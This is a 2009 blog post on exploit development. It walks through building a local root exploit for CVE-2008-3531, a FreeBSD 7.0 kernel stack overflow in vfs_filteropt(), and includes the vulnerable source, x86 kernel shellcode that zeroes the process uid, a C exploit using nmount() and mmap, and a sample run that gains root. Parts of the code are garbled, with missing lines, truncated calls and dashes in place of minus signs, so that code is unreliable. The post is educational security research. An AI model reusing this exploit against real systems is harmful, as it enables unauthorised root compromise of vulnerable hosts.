POSTED BY: Patroklos Argyroudis / 02.07.2009

CVE-2008-3531: FreeBSD kernel stack overflow exploit development

About four months ago I developed a reliable exploit for vulnerability CVE-2008-3531, which is also addressed in the advisory FreeBSD-SA-08:08.nmount. In this post I will use this vulnerability to provide an overview of the development process for FreeBSD kernel stack exploits.

CVE-2008-3531 is a kernel stack overflow vulnerability that affects FreeBSD versions 7.0-RELEASE and 7.0-STABLE, but not 7.1-RELEASE nor 7.1-STABLE as the CVE entry seems to suggest.

The bug is in function vfs_filteropt() at src/sys/kern/vfs_mount.c:

1800:    int
1801:    vfs_filteropt(struct vfsoptlist *opts, const char **legal)
1802:    {
1803:        struct vfsopt *opt;
1804:        char errmsg[255];
1805:        const char **t, *p, *q;
1806:        int ret = 0;
1808:        TAILQ_FOREACH(opt, opts, link) {
1809:                p = opt->name;
1810:                q = NULL;
1811:                if (p[0] == 'n' && p[1] == 'o')
1812:                        q = p + 2;
1813:                for(t = global_opts; *t != NULL; t++) {
1814:                        if (strcmp(*t, p) == 0)
1815:                                break;
1816:                        if (q != NULL) {
1817:                                if (strcmp(*t, q) == 0)
1818:                                        break;
1819:                        }
1820:                }
1821:                if (*t != NULL)
1822:                        continue;
1823:                for(t = legal; *t != NULL; t++) {
1824:                        if (strcmp(*t, p) == 0)
1825:                                break;
1826:                        if (q != NULL) {
1827:                                if (strcmp(*t, q) == 0)
1828:                                        break;
1829:                        }
1830:                }
1831:                if (*t != NULL)
1832:                        continue;
1833:                sprintf(errmsg, "mount option <%s> is unknown", p);
1834:                printf("%s\n", errmsg);
1835:                ret = EINVAL;
1836:        }
1837:        if (ret != 0) {
1838:                TAILQ_FOREACH(opt, opts, link) {
1839:                        if (strcmp(opt->name, "errmsg") == 0) {
1840:                              strncpy((char *)opt->value, errmsg,
1841:                        }
1842:                }
1843:        }
1844:        return (ret);
1845:    }

The first step of the exploit development process involves identifying the vulnerability’s conditions and assessing its impact.

In line 1833 sprintf() is used to write an error message to a locally declared static buffer, namely errmsg declared in line 1804 with a size of 255 bytes. The variable p used in sprintf() is a pointer to the mount option’s name. Conceptually a mount option is a tuple of the form (name, value). The vulnerable sprintf() call can be reached from userland when p‘s (i.e. the mount option’s name) corresponding value is invalid, but not NULL (due to the checks performed in the first TAILQ_FOREACH loop). For example, the tuple (“AAAA”, “BBBB”) satisfies this condition; the mount option’s value is the string “BBBB” which is invalid and not NULL therefore p would point to the string “AAAA”. Both the mount option’s name (p) and the mount option’s value are user-controlled. This allows the overflow of the errmsg buffer by supplying a mount option name of arbitrary length and as we will see below, less importantly in this case, arbitrary content. Since errmsg is on a kernel stack, we can use the overflow to corrupt the current stack frame’s saved return address with the ultimate goal of diverting the kernel’s execution flow to code of our own choosing.

Now that we have explored the conditions and concluded that we can indeed achieve arbitrary code execution we have to explore the ways we can trigger the vulnerability. There are many possible execution paths to reach vfs_filteropt() from userland. After browsing FreeBSD’s file system stacking source code for a couple of minutes I decided to use the following:

nmount() -> vfs_donmount() -> msdosfs_mount() -> vfs_filteropt()

By default on FreeBSD the nmount(2) system call can only be called by root. In order for it to be enabled for unprivileged users the sysctl(8) variable vfs.usermount must be set to a non-zero value.

At this point we know that the vulnerability can potentially lead to arbitrary code execution and how to trigger it. The next step is to find a place to store our arbitrary code and divert the kernel’s execution flow to that memory address. Due to the structure of the format string used in the sprintf() call, we do not have direct control of the value that overwrites the saved return address in vfs_filteropt()‘s kernel stack frame.

However, indirect control is more than enough to achieve arbitrary code execution. When p points to a string of 248 ‘A’s followed by NULL (i.e. 248 * ‘A’ + ‘\0’) the saved return address is overwritten with the value 0x6e776f, that is the “nwo” of “unknown” in the sprintf()‘s format string. Using the exploitation methodology of kernel NULL pointer dereference vulnerabilities, we can use mmap(2) to map memory at the page boundary 0x6e7000. Then we can place our arbitrary kernel shellcode 0x76f bytes after that. Therefore, when the corrupted saved return address with the value 0x6e776f is restored into the EIP register the kernel will execute our instructions that have been mapped to this address.

The next step in the exploit development process is to write these instructions. Specifically, our kernel shellcode should:

  • locate the credentials of the user that triggers the vulnerability and escalate his privileges,
  • ensure kernel continuation. In other words, the system must be kept in a running condition and stable after exploitation.
User credentials specifying the process owner’s privileges in FreeBSD are stored in a structure of type ucred defined at src/sys/ucred.h:
45:  struct ucred {
46:      u_int   cr_ref;                 /* reference count */
47:  #define cr_startcopy cr_uid
48:      uid_t   cr_uid;                 /* effective user id */
49:      uid_t   cr_ruid;                /* real user id */
50:      uid_t   cr_svuid;               /* saved user id */
51:      short   cr_ngroups;             /* number of groups */
52:      gid_t   cr_groups[NGROUPS];     /* groups */
53:      gid_t   cr_rgid;                /* real group id */
54:      gid_t   cr_svgid;               /* saved group id */

A pointer to the ucred structure exists in a structure of type proc defined at src/sys/proc.h:

484:  struct proc {
485:   LIST_ENTRY(proc) p_list;           /* (d) List of all processes. */
486:   TAILQ_HEAD(, thread) p_threads;    /* (j) all threads. */
487:   TAILQ_HEAD(, kse_upcall) p_upcalls; /* (j) All upcalls in the proc. */
488:   struct mtx      p_slock;           /* process spin lock */
489:   struct ucred    *p_ucred;          /* (c) Process owner's identity. */

The address of the proc structure can be dynamically located at runtime from unprivileged processes in a number of ways:

  • The sysctl(3) kernel interface and the kinfo_proc structure.
  • The allproc symbol that the FreeBSD kernel exports by default.
  • The curthread pointer from the pcpu structure (segment FS in kernel context points to it).

You can find more information about the first alternative in the talk I gave on FreeBSD kernel stack overflows at the University of Piraeus Software Libre Society, Event #16: Computer Security (unfortunately the slides from the talk are only available in Greek currently). The second alternative will be the subject of a future post. In the developed exploit I will use the third alternative.

The other task that our shellcode should perform is to maintain the stability of the system by ensuring the kernel’s continuation. One way to approach this would be to port Silvio Cesare’s “iret” return to userland approach (presented at his “Open source kernel auditing and exploitation” Black Hat talk) to FreeBSD. Although a full investigation of Silvio’s “iret” technique on FreeBSD would be very interesting, it is beyond the scope of this post.

In order to successfully return to userland from the kernel shellcode I will use another approach. Remember that the execution path I decided to take is nmount() -> vfs_donmount() -> msdosfs_mount() -> vfs_filteropt(). After the shellcode has performed privilege escalation it could return to where vfs_filteropt() was supposed to return, that is in msdosfs_mount(). However that is not possible since msdosfs_mount()‘s saved registers have been corrupted when vfs_filteropt()‘s stack frame was smashed by the overflow. The values of these saved registers cannot be restored, consequently there is no safe way to return to msdosfs_mount() after privilege escalation. The solution I have implemented in the exploit bypasses msdosfs_mount() completely and returns to the pre-previous from vfs_filteropt() function, namely vfs_donmount(). The saved registers’ values of vfs_donmount() are uncorrupted in msdosfs_mount()‘s stack frame. To make this more clear, consider the following pseudocode that is based on the relevant deadlisting part:

/* this function's saved registers' values are uncorrupted */

    /* stack cleanup, restore saved registers */
    addl    $0xe8, %esp
    popl    %ebx
    popl    %esi
    popl    %edi
    popl    %ebp

Taking into consideration the above analysis, the complete kernel shellcode for the developed exploit is the following (you can download it from here):

.global _start

movl    %fs:0, %eax         # get curthread
movl    0x4(%eax), %eax     # get proc from curthread
movl    0x30(%eax), %eax    # get ucred from proc
xorl    %ecx, %ecx          # ecx = 0
movl    %ecx, 0x4(%eax)     # ucred.uid = 0
movl    %ecx, 0x8(%eax)     # ucred.ruid = 0

# return to the pre-previous function, i.e. vfs_donmount()
addl    $0xe8, %esp
popl    %ebx
popl    %esi
popl    %edi
popl    %ebp

Now we have a way to safely return from kernel to userland and ensure the continuation of the exploited system. The complete exploit is (you can download it from here):

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/uio.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>

#define BUFSIZE     249

#define PAGESIZE    4096
#define ADDR        0x6e7000
#define OFFSET      1903

#define FSNAME      "msdosfs"
#define DIRPATH     "/tmp/msdosfs"

unsigned char kernelcode[] =

    void *vptr;
    struct iovec iov[6];

    vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,
            MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);

    if(vptr == MAP_FAILED)

    vptr += OFFSET;
    printf("[*] vptr = 0x%.8x\n", (unsigned int)vptr);

    memcpy(vptr, kernelcode, (sizeof(kernelcode) — 1));

    mkdir(DIRPATH, 0700);

    iov[0].iov_base = "fstype";
    iov[0].iov_len = strlen(iov[0].iov_base) + 1;
    iov[1].iov_base = FSNAME;
    iov[1].iov_len = strlen(iov[1].iov_base) + 1;
    iov[2].iov_base = "fspath";
    iov[2].iov_len = strlen(iov[2].iov_base) + 1;
    iov[3].iov_base = DIRPATH;
    iov[3].iov_len = strlen(iov[3].iov_base) + 1;

    iov[4].iov_base = calloc(BUFSIZE, sizeof(char));

    if(iov[4].iov_base == NULL)

    memset(iov[4].iov_base, 0x41, (BUFSIZE — 1));
    iov[4].iov_len = BUFSIZE;

    iov[5].iov_base = "BBBB";
    iov[5].iov_len = strlen(iov[5].iov_base) + 1;

    printf("[*] calling nmount()\n");

    if(nmount(iov, 6, 0) < 0)

    printf("[*] unmounting and deleting %s\n", DIRPATH);
    unmount(DIRPATH, 0);

    return EXIT_SUCCESS;

Finally, a sample run of the exploit:

[argp@leon ~]$ uname -rsi
[argp@leon ~]$ sysctl vfs.usermount
vfs.usermount: 1
[argp@leon ~]$ id
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531
[argp@leon ~]$ ./cve-2008-3531
[*] vptr = 0x006e776f
[*] calling nmount()
nmount: Unknown error: -1036235776
[argp@leon ~]$ id
uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)

And this concludes my post. I hope you enjoyed reading this as much as I enjoyed writing it.